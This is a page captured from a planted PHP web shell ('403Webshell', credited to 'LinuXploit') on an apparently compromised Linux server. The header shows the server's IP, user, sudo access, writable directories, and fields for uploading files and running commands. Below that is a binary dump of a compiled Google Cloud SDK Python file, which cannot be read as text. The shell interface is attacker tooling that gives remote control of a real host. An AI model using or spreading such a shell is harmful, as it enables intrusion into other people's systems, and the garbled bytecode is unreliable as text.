403Webshell
Server IP : 35.236.43.222  /  Your IP : 216.73.216.143
Web Server : Apache
System : Linux order-form-vm-001 5.10.0-37-cloud-amd64 #1 SMP Debian 5.10.247-1 (2025-12-11) x86_64
User : deploy ( 1002)
PHP Version : 8.1.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/google-cloud-sdk/lib/surface/transfer/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib/google-cloud-sdk/lib/surface/transfer/__pycache__/authorize.cpython-311.pyc
�

��$��X�dZddlmZddlmZddlmZddlZddlZddlmZddl	m
Z
ddlmZdd	l
mZdd
lmZddlmZddlmZdd
lmZddlmZddlmZegd���Zeddg��Zedg��ZdZd�Z d�Z!d�Z"ej#Gd�dej$����Z%dS)z+Command to authorize accounts for transfer.�)�absolute_import)�division)�unicode_literalsN)�projects_api)�apis)�base)�util)�log)�
properties)�creds)�store)�universe_descriptor)�files)zroles/ownerzroles/storagetransfer.adminz#roles/storagetransfer.transferAgentzroles/storage.objectAdminzroles/pubsub.editorzroles/storage.adminz"roles/storagetransfer.serviceAgentzroles/pubsub.publisherzDserviceAccount:service-{project_number}@{service_account_url_suffix}c�:�|rdnd}d�||��S)z=Returns an email format useful for interacting with IAM APIs.�serviceAccount�userz{}:{})�format)�email_string�is_service_account�
iam_prefixs   �!lib/surface/transfer/authorize.py�_get_iam_prefixed_emailr4s&��#5�A���6�*�	���
�L�	1�	1�1�c���tj���tjjj�����j}|rd|�d�}nd}t�	||���S)zReturns a GCS SA email.zgs-project-accounts.z.iam.gserviceaccount.comz+gs-project-accounts.iam.gserviceaccount.com)�project_number�service_account_url_suffix)
r�UniverseDescriptor�Getr�VALUES�core�universe_domain�project_prefix�SERVICE_ACCOUNT_URL_FORMATr)rr"rs   r�_get_iam_prefiexed_gcs_sa_emailr$:s����,�.�.�
�s�:��!�1�5�5�7�7�8�8���
�O�G�~�G�G�G���"O��	#�	*�	*�#�!;�
+�
�
�rc���t��}|jD]E}t�fd�|jD����r#|j|vr|�|j���F|S)zEReturns roles in IAM policy from roles_set assigned to account email.c���g|]}|�k��	S�r')�.0�m�prefixed_account_emails  �r�
<listcomp>z<_get_existing_transfer_roles_for_account.<locals>.<listcomp>Ws���B�B�B�Q�Q�(�
(�B�B�Br)�set�bindings�any�members�role�add)�project_iam_policyr*�	roles_set�roles�bindings `   r�(_get_existing_transfer_roles_for_accountr6Msp����%�%�%�
$�,���g��B�B�B�B�'�/�B�B�B�C�C����	�!�!��i�i�������	�,rc�8�eZdZdZddd�Zed���Zd�ZdS)�	Authorizez7Authorize an account for all Transfer Service features.a       Authorize a Google account for all Transfer Service features.

      This command provides admin and owner rights for simplicity. If that's
      too much authority for your use case, see custom setups here:
      https://cloud.google.com/storage-transfer/docs/on-prem-set-up
      aS      To see what Transfer Service IAM roles the account logged into gcloud may
      be missing, run:

        $ {command}

      To add the missing IAM roles, run:

        $ {command} --add-missing

      To check a custom service account for missing roles, run:

        $ {command} --creds-file=path/to/service-account-key.json
      )�DESCRIPTION�EXAMPLESc�d�|�dd���|�ddd���dS)Nz--creds-fileaJThe path to the creds file for an account to authorize. The file should be in JSON format and contain a "type" and "client_email", which are automatically generated for most creds files downloaded from Google (e.g. service account tokens). If this flag is not present, the command authorizes the user currently logged into gcloud.)�helpz
--add-missing�
store_truez�Add IAM roles necessary to use all Transfer Service features to the specified account. By default, this command just prints missing roles.)�actionr<)�add_argument)�parsers r�ArgszAuthorize.Args|s[��
����)��*�*�*������!��"�"�"�"�"rc�2����tjdd��}tjdd��}|jr�tj�tj�|j����}tj	|��5}	tj|��}|d}|ddk}n<#ttf$r(}	tj|	��td���d}	~	wwxYwt!||���ddd��n#1swxYwYn]t"jjj���}t-jt1j����}t!||���t"jjj���}
t7j|
��}t;j|��}t?|�t@��}
tj!�"d�#|tI|
������t@|
z
}tj!�"d�#tI|�������fd	�|D��}tj!�"d
��|j%�|�&|
�����j'}t!|d�
���t?|�tP��}tj!�"d�#|tI|������tP|z
}tj!�"d�#tI|������|�fd�|D��z
}|�)��tTj)j+ur�t7j,|
��}t[|���t?|�t\��}tj!�"d
��tj!�"d�#�tI|������t\|z
}tj!�"d�#tI|������|�fd�|D��z
}|j/s|r�tj!�"d
��|j/r�|r�tj!�"d�#|����t;j0||��tj!�"d
��tj!�"d��dStj!�"d��dStj!�"d��dSdS)N�storagetransfer�v1�client_email�type�service_accountzKInvalid creds file format. Run command with "--help" flag for more details.zUser {} has roles:
{}zMissing roles:
{}c���g|]}�|f��Sr'r')r(r0r*s  �rr+z!Authorize.Run.<locals>.<listcomp>�s,������+/�	��&���rz***)�	projectIdT)rz0Google-managed transfer account {} has roles:
{}c���g|]}�|f��Sr'r')r(r0�prefixed_transfer_p4sa_emails  �rr+z!Authorize.Run.<locals>.<listcomp>�s,��� � � �15�	%�t�,� � � rz/Google-managed service account {} has roles:
{}c���g|]}�|f��Sr'r')r(r0�prefixed_gcs_sa_emails  �rr+z!Authorize.Run.<locals>.<listcomp>�s,���"�"�"�,0� �$�
'�"�"�"rzAdding roles:
{}zkDone. Permissions typically take seconds to propagate, but, in some cases, it can take up to seven minutes.zNo missing roles to add.z.Rerun with --add-missing to add missing roles.)1r�GetClientInstance�GetMessagesModule�
creds_file�os�path�abspath�
expanduserr�
FileReader�json�load�
ValueError�KeyErrorr
�errorrrrr �accountrr�IsServiceAccountCredentials�creds_store�Load�project�
projects_util�ParseProjectr�GetIamPolicyr6�EXPECTED_USER_ROLES�status�Printr�list�googleServiceAccounts�.StoragetransferGoogleServiceAccountsGetRequest�accountEmail�EXPECTED_P4SA_ROLES�ReleaseTrackr�ALPHA�GetProjectNumberr$�EXPECTED_GCS_SA_ROLES�add_missing�AddIamPolicyBindings)�self�args�client�messages�expanded_file_path�file_reader�parsed_creds_file�
account_emailr�e�
project_id�parsed_project_idr2�existing_user_roles�missing_user_roles�all_missing_role_tuples�transfer_p4sa_email�existing_p4sa_roles�missing_p4sa_rolesr�existing_gcs_sa_roles�missing_gcs_sa_rolesr*rMrKs                      @@@r�Runz
Authorize.Run�s�����
�
#�$5�t�
<�
<�F��%�&7��>�>�H���K��7�?�?�2�7�+=�+=�d�o�+N�+N�O�O����.�/�/�
/�;�	P�"�i��4�4�
�+�N�;�-�0��8�<M�M�
�
���H�%�	P�	P�	P�

�)�A�,�,�,��O�P�P�P�����	P����"9��-�"/�"/��
/�
/�
/�
/�
/�
/�
/�
/�
/�
/�
/����
/�
/�
/�
/��!�'�,�4�8�8�:�:�m� �<�[�=M�=O�=O�P�P��6�}�7I� K� K���"�'�/�3�3�5�5�J�%�2�:�>�>��%�2�3D�E�E��B��2�4G�I�I���J���-�4�4�]�59�:M�5N�5N�P�P�Q�Q�Q�,�/B�B���J���)�0�0��6H�1I�1I�J�J�K�K�K�����3E������J���U���� �6�:�:��?�?� �	@�	"�	"�#�#�#/��$;���$6�$6�$6� �C��8�:M�O�O���J���H�O�O��T�"5�6�6�8�8�9�9�9�,�/B�B���J���)�0�0��6H�1I�1I�J�J�K�K�K�� � � � �9K� � � ��������d�/�5�5�5�$�5�j�A�A�n�=�n�M�M��F�
�3�5J�L�L��	�j���u����	�j���
<�
C�
C�#�T�*?�%@�%@������
3�5J�J��	�j���+�2�2�4�8L�3M�3M�N�N�O�O�O��"�"�"�"�4H�"�"�"�����K�2�K�	�j���u����	
�	�K�"�	7�

�*�
�
�.�5�5�6M�N�N�
O�
O�
O�
�
+�,=�,C�E�E�E�

�*�
�
�5�
!�
!�
!��*�
�
�A�B�B�B�B�B��*�
�
�5�
6�
6�
6�
6�
6��
���I�J�J�J�J�J�!K�Ks6�
D
�(B5�4D
�5C.�#C)�)C.�.D
�
D�DN)�__name__�
__module__�__qualname__�__doc__�
detailed_help�staticmethodrAr�r'rrr8r8]sd������?�?�

�

���-�4�"�"��<�"� ZK�ZK�ZK�ZK�ZKrr8)&r��
__future__rrrrVrQ�+googlecloudsdk.api_lib.cloudresourcemanagerr�googlecloudsdk.api_lib.utilr�googlecloudsdk.callioper�#googlecloudsdk.command_lib.projectsr	r`�googlecloudsdk.corer
r�googlecloudsdk.core.credentialsrr
r]�'googlecloudsdk.core.universe_descriptorr�googlecloudsdk.core.utilr�	frozensetrcrjrnr#rr$r6�UniverseCompatible�Commandr8r'rr�<module>r�s���2�1�&�&�&�&�&�&�������'�'�'�'�'�'�����	�	�	�	�D�D�D�D�D�D�,�,�,�,�,�,�(�(�(�(�(�(�E�E�E�E�E�E�#�#�#�#�#�#�*�*�*�*�*�*�1�1�1�1�1�1�@�@�@�@�@�@�G�G�G�G�G�G�*�*�*�*�*�*��i�!�!�!���� �i��(�!����"�	�#;�"<�=�=��J��
2�2�2����&
�
�
� ��IK�IK�IK�IK�IK���IK�IK���IK�IK�IKr

Youez - 2016 - github.com/yon3zu
LinuXploit